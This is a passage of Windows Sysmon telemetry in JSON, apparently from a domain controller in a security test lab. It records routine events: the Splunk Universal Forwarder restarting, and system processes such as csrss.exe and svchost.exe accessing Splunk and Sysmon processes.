MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {E2A3D6B1-10FF-5F25-0000-001016560500}\r\nParentProcessId: 5004\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2792","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.684","ProcessGuid":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2792","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-001016560500}","ParentProcessId":"5004","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2792","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3193,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-001016560500}\r\nSourceProcessId: 5004\r\nSourceThreadId: 4900\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nTargetProcessId: 4864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40f97|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d40f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-001016560500}","SourceProcessId":"5004","SourceThreadId":"4900","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","TargetProcessId":"4864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40f97|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d40f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3194,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D8570500}\r\nTargetProcessId: 4864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D8570500}","TargetProcessId":"4864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3195,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3196,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3197,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3198,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3199,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3200,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.674\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.674","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
